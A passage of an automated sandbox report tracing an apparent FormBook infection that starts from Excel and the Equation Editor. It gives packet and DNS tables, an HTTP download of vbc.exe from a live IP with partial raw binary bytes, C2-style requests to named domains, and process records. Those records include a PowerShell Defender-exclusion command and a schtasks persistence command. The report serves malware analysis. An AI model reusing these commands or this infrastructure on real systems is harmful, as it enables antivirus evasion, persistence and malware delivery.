May 14, 2022 15:10:56.323057890 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.323071957 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.323080063 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.323091984 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.323107004 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330269098 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330296040 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330315113 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330332994 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330348969 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330365896 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330384970 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330403090 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330404997 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330419064 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330437899 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330437899 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330444098 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330449104 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330456018 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330473900 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330481052 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330492020 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330497980 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330509901 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330516100 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330528975 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330530882 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330547094 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330565929 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330565929 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330573082 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330579042 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330584049 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330600023 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330601931 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330620050 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330622911 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330636978 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330636978 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330652952 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330656052 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330668926 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330673933 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330692053 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330694914 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330710888 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330710888 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330725908 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330729961 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330741882 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330746889 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330764055 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330773115 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330784082 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330785990 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330797911 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.330799103 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330813885 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.330826044 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.339864969 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:59.077002048 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:12:19.408072948 CEST	49174	80	192.168.2.22	185.53.179.171
May 14, 2022 15:12:19.423587084 CEST	80	49174	185.53.179.171	192.168.2.22
May 14, 2022 15:12:19.423747063 CEST	49174	80	192.168.2.22	185.53.179.171
May 14, 2022 15:12:19.439341068 CEST	80	49174	185.53.179.171	192.168.2.22
May 14, 2022 15:12:19.439414024 CEST	49174	80	192.168.2.22	185.53.179.171
May 14, 2022 15:12:19.454981089 CEST	80	49174	185.53.179.171	192.168.2.22
May 14, 2022 15:12:19.455019951 CEST	80	49174	185.53.179.171	192.168.2.22
May 14, 2022 15:12:19.455049038 CEST	80	49174	185.53.179.171	192.168.2.22
May 14, 2022 15:12:19.455198050 CEST	49174	80	192.168.2.22	185.53.179.171
May 14, 2022 15:12:19.455239058 CEST	49174	80	192.168.2.22	185.53.179.171
May 14, 2022 15:12:19.471153021 CEST	80	49174	185.53.179.171	192.168.2.22
May 14, 2022 15:12:24.610527992 CEST	49175	80	192.168.2.22	5.183.8.183
May 14, 2022 15:12:24.748250008 CEST	80	49175	5.183.8.183	192.168.2.22
May 14, 2022 15:12:24.748400927 CEST	49175	80	192.168.2.22	5.183.8.183
May 14, 2022 15:12:24.748725891 CEST	49175	80	192.168.2.22	5.183.8.183
May 14, 2022 15:12:24.886285067 CEST	80	49175	5.183.8.183	192.168.2.22
May 14, 2022 15:12:24.983777046 CEST	80	49175	5.183.8.183	192.168.2.22
May 14, 2022 15:12:24.983812094 CEST	80	49175	5.183.8.183	192.168.2.22
May 14, 2022 15:12:24.983921051 CEST	49175	80	192.168.2.22	5.183.8.183
May 14, 2022 15:12:26.750436068 CEST	49175	80	192.168.2.22	5.183.8.183
May 14, 2022 15:12:26.888199091 CEST	80	49175	5.183.8.183	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 15:12:19.370465040 CEST	55868	53	192.168.2.22	8.8.8.8
May 14, 2022 15:12:19.395308971 CEST	53	55868	8.8.8.8	192.168.2.22
May 14, 2022 15:12:24.475665092 CEST	49688	53	192.168.2.22	8.8.8.8
May 14, 2022 15:12:24.609047890 CEST	53	49688	8.8.8.8	192.168.2.22
May 14, 2022 15:12:36.769105911 CEST	58836	53	192.168.2.22	8.8.8.8
May 14, 2022 15:12:36.791018009 CEST	53	58836	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 14, 2022 15:12:19.370465040 CEST	192.168.2.22	8.8.8.8	0xceee	Standard query (0)	www.employeebnsf.com	A (IP address)	IN (0x0001)
May 14, 2022 15:12:24.475665092 CEST	192.168.2.22	8.8.8.8	0xc4a9	Standard query (0)	www.dems-clicks.com	A (IP address)	IN (0x0001)
May 14, 2022 15:12:36.769105911 CEST	192.168.2.22	8.8.8.8	0xca6d	Standard query (0)	www.cariniclinicalconsulting.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 14, 2022 15:12:19.395308971 CEST	8.8.8.8	192.168.2.22	0xceee	No error (0)	www.employeebnsf.com	185.53.179.171	A (IP address)	IN (0x0001)
May 14, 2022 15:12:24.609047890 CEST	8.8.8.8	192.168.2.22	0xc4a9	No error (0)	www.dems-clicks.com	5.183.8.183	A (IP address)	IN (0x0001)
May 14, 2022 15:12:36.791018009 CEST	8.8.8.8	192.168.2.22	0xca6d	No error (0)	www.cariniclinicalconsulting.com	104.21.75.67	A (IP address)	IN (0x0001)
May 14, 2022 15:12:36.791018009 CEST	8.8.8.8	192.168.2.22	0xca6d	No error (0)	www.cariniclinicalconsulting.com	172.67.215.254	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

198.12.89.166

www.employeebnsf.com

www.dems-clicks.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	198.12.89.166	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:10:55.400794983 CEST	2	OUT	GET /55/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.12.89.166 Connection: Keep-Alive
May 14, 2022 15:10:55.518570900 CEST	3	IN	HTTP/1.1 200 OK Date: Sat, 14 May 2022 13:10:55 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Last-Modified: Sat, 14 May 2022 08:24:47 GMT ETag: "b2a00-5def4862be45b" Accept-Ranges: bytes Content-Length: 731648 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4f 67 7f 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 20 0b 00 00 08 00 00 00 00 00 00 0a 3f 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 3e 0b 00 4f 00 00 00 00 40 0b 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 b9 01 00 80 47 01 00 03 00 00 00 9d 00 00 06 08 01 03 00 b0 3d 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 1b 00 00 0a 00 00 2a 46 02 28 1b 00 00 0a 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 1c 00 00 0a 00 00 2a 2e 02 03 04 28 1d 00 00 0a 00 00 2a 2e 02 03 04 28 1e 00 00 0a 00 00 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 26 02 28 01 00 00 06 00 00 2a 46 02 28 01 00 00 06 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 03 00 00 06 00 00 2a 2e 02 03 04 28 04 00 00 06 00 00 2a 2e 02 03 04 28 05 00 00 06 00 00 2a 00 13 30 02 00 18 00 00 00 01 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d4 01 00 06 0b 2b 00 07 2a 13 30 02 00 18 00 00 00 02 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d7 01 00 06 0b 2b 00 07 2a 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f da 01 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d9 01 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 20 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d5 01 00 06 00 06 6f 24 02 00 06 0b 2b 00 07 2a 13 30 02 00 20 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d8 01 00 06 00 06 6f 24 02 00 06 0b 2b 00 07 2a 2e 28 85 01 00 06 6f 8c 01 00 06 2a 2e 28 85 01 00 06 6f 8d 01 00 06 2a 2e 28 85 01 00 06 6f 8e Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELOgb0 ? @@ @>O@` H.text `.rsrc@"@@.reloc`(@B>HG=&(F(((.(.({"}&(F(((.(.(0(oo+0(oo+0(oo+0(oo+0 (ooo$+0 (ooo$+.(o.(o.(o
May 14, 2022 15:10:55.518635035 CEST	5	IN	Data Raw: 01 00 06 2a 2e 28 85 01 00 06 6f 88 01 00 06 2a 2e 28 85 01 00 06 6f 89 01 00 06 2a 2e 28 85 01 00 06 6f 98 01 00 06 2a 2e 28 85 01 00 06 6f 99 01 00 06 2a 2e 28 85 01 00 06 6f 9a 01 00 06 2a 2e 28 85 01 00 06 6f 9b 01 00 06 2a 2e 28 85 01 00 06 Data Ascii: .(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o.(o
May 14, 2022 15:10:55.518676043 CEST	6	IN	Data Raw: 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 05 00 00 11 02 7b 3b 00 00 04 0a 06 0b 07 03 28 26 00 00 0a 74 1d 00 00 01 0c 02 7c 3b 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 5a 00 02 7b 3b 00 00 04 25 2d 03 26 2b 08 14 14 6f 27 00 Data Ascii: +30){;(&t\|;(+3Z{;%-&+o'.s4B((}<^}=()(0+,{=+,{=o(+0s,}>s-}?s-}@
May 14, 2022 15:10:55.518713951 CEST	7	IN	Data Raw: 7d 45 00 00 04 02 28 29 00 00 0a 00 00 02 28 c3 00 00 06 00 02 03 28 be 00 00 06 00 02 28 bd 00 00 06 00 02 28 c1 00 00 06 00 2a 00 13 30 03 00 dd 00 00 00 00 00 00 00 00 02 02 7b 44 00 00 04 72 39 03 00 70 6f cd 01 00 06 6f 3d 00 00 0a 00 02 7b Data Ascii: }E()((((*0{Dr9poo={L{DrOpoo={M{Dr[poo={R{Drepoo={P{Drqpoo={O{Dr}poo={H{Drpoo
May 14, 2022 15:10:55.518757105 CEST	9	IN	Data Raw: 02 73 2d 00 00 0a 7d 4d 00 00 04 02 73 2d 00 00 0a 7d 52 00 00 04 02 73 65 00 00 0a 7d 4e 00 00 04 02 73 64 00 00 0a 7d 54 00 00 04 02 7b 46 00 00 04 6f 30 00 00 0a 00 02 7b 47 00 00 04 6f 30 00 00 0a 00 02 7b 4a 00 00 04 6f 30 00 00 0a 00 02 7b Data Ascii: s-}Ms-}Rse}Nsd}T{Fo0{Go0{Jo0{So/{To/(0{Fo9{Fof{Fog{Foh"Bsioj&{Foh"Asioj&{Fok{Gol{Fok
May 14, 2022 15:10:55.518815041 CEST	10	IN	Data Raw: 0a 02 7b 4c 00 00 04 16 16 6f 6c 00 00 0a 00 02 7b 4a 00 00 04 6f 6b 00 00 0a 02 7b 4d 00 00 04 16 17 6f 6c 00 00 0a 00 02 7b 4a 00 00 04 6f 6b 00 00 0a 02 7b 52 00 00 04 16 18 6f 6c 00 00 0a 00 02 7b 4a 00 00 04 6f 6b 00 00 0a 02 7b 4e 00 00 04 Data Ascii: {Lol{Jok{Mol{Jok{Rol{Jok{Nol{Jok{Tol{Js1o2{Jrpo3{Jom{Jonsqop&{Jonsqop&{Jonsqop&{Jonsq
May 14, 2022 15:10:55.518857956 CEST	12	IN	Data Raw: 00 04 18 6f 3c 00 00 0a 00 02 7b 52 00 00 04 72 e1 05 00 70 6f 3d 00 00 0a 00 02 7b 4e 00 00 04 1a 6f 40 00 00 0a 00 02 7b 4e 00 00 04 1f 2f 1c 73 31 00 00 0a 6f 32 00 00 0a 00 02 7b 4e 00 00 04 19 1c 1c 1c 73 3a 00 00 0a 6f 7e 00 00 0a 00 02 7b Data Ascii: o<{Rrpo={No@{N/s1o2{Ns:o~{No]{Nrpo3{N s4o5{No<{To@{To{{T%% s\|o}{T/fs1o2{Ts:
May 14, 2022 15:10:55.518902063 CEST	13	IN	Data Raw: 70 6f ab 00 00 0a 16 6f ac 00 00 0a 00 02 7b 5c 00 00 04 6f aa 00 00 0a 72 ab 06 00 70 6f ab 00 00 0a 16 6f ac 00 00 0a 00 02 7b 5c 00 00 04 02 7b 5c 00 00 04 6f aa 00 00 0a 72 b9 06 00 70 6f ab 00 00 0a 16 6f ad 00 00 0a 00 02 7b 5c 00 00 04 6f Data Ascii: poo{\orpoo{\{\orpoo{\orpoo*0{`o({\oo({2(o?o+,,{Urpo{Urpo0(X&+%{_
May 14, 2022 15:10:55.518944979 CEST	15	IN	Data Raw: 17 6f 6d 00 00 0a 00 02 7b 58 00 00 04 6f 6e 00 00 0a 18 22 00 00 c8 42 73 6f 00 00 0a 6f 70 00 00 0a 26 02 7b 58 00 00 04 1f 51 1f 25 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 58 00 00 04 18 6f 3c 00 00 0a 00 02 7b 59 00 00 04 1e 6f 40 00 00 0a 00 Data Ascii: om{Xon"Bsoop&{XQ%s4o5{Xo<{Yo@{Yo9{Yoy{Yos{Ys1o2{Yrpo3{Ys:o;{YKs4o5{Yo<{Yr-po={You
May 14, 2022 15:10:55.518989086 CEST	16	IN	Data Raw: 17 6f 6d 00 00 0a 00 02 7b 5e 00 00 04 6f 6e 00 00 0a 73 71 00 00 0a 6f 70 00 00 0a 26 02 7b 5e 00 00 04 20 16 01 00 00 1f 20 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 5e 00 00 04 18 6f 3c 00 00 0a 00 02 7b 5f 00 00 04 1a 6f 40 00 00 0a 00 02 7b 5f Data Ascii: om{^onsqop&{^ s4o5{^o<{_o@{_ s1o2{_s:o~{_% 's\|o_{_%s\|o^{_rpo3{_8s4o5{_o<{_o
May 14, 2022 15:10:55.632600069 CEST	17	IN	Data Raw: 06 28 d0 00 00 0a 6f 54 00 00 0a 00 02 7b 6f 00 00 04 02 7b 63 00 00 04 6f 55 02 00 06 6f 3d 00 00 0a 00 02 7b 6e 00 00 04 02 7b 63 00 00 04 6f 57 02 00 06 28 53 00 00 0a 6f 54 00 00 0a 00 2a 00 00 13 30 02 00 6b 00 00 00 00 00 00 00 00 02 7b 6a Data Ascii: (oT{o{coUo={n{coW(SoT0k{j((o^{j((o_{o(o]{n((So^{n((So_06{co"{joZ(,k({

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49174	185.53.179.171	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:12:19.439414024 CEST	775	OUT	GET /n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ== HTTP/1.1 Host: www.employeebnsf.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 15:12:19.455019951 CEST	776	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Sat, 14 May 2022 13:12:19 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49175	5.183.8.183	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:12:24.748725891 CEST	777	OUT	GET /n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH HTTP/1.1 Host: www.dems-clicks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 15:12:24.983777046 CEST	777	IN	HTTP/1.1 404 Not Found Date: Sat, 14 May 2022 13:12:24 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 2816, Parent PID: 576

General

Target ID:	0
Start time:	15:10:18
Start date:	14/05/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f570000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 2212, Parent PID: 576

General

Target ID:	2
Start time:	15:10:44
Start date:	14/05/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 1200, Parent PID: 2212

General

Target ID:	4
Start time:	15:10:49
Start date:	14/05/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x1260000
File size:	731648 bytes
MD5 hash:	F7ECD12D134AAF3541396C78337CE672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2532, Parent PID: 1200

General

Target ID:	5
Start time:	15:10:57
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Imagebase:	0x224d0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2452, Parent PID: 1200

General

Target ID:	7
Start time:	15:10:58
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp
Imagebase:	0x210000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 1072, Parent PID: 1200

General

Target ID:	9
Start time:	15:11:00
Start date:	14/05/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x1260000
File size:	731648 bytes
MD5 hash:	F7ECD12D134AAF3541396C78337CE672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
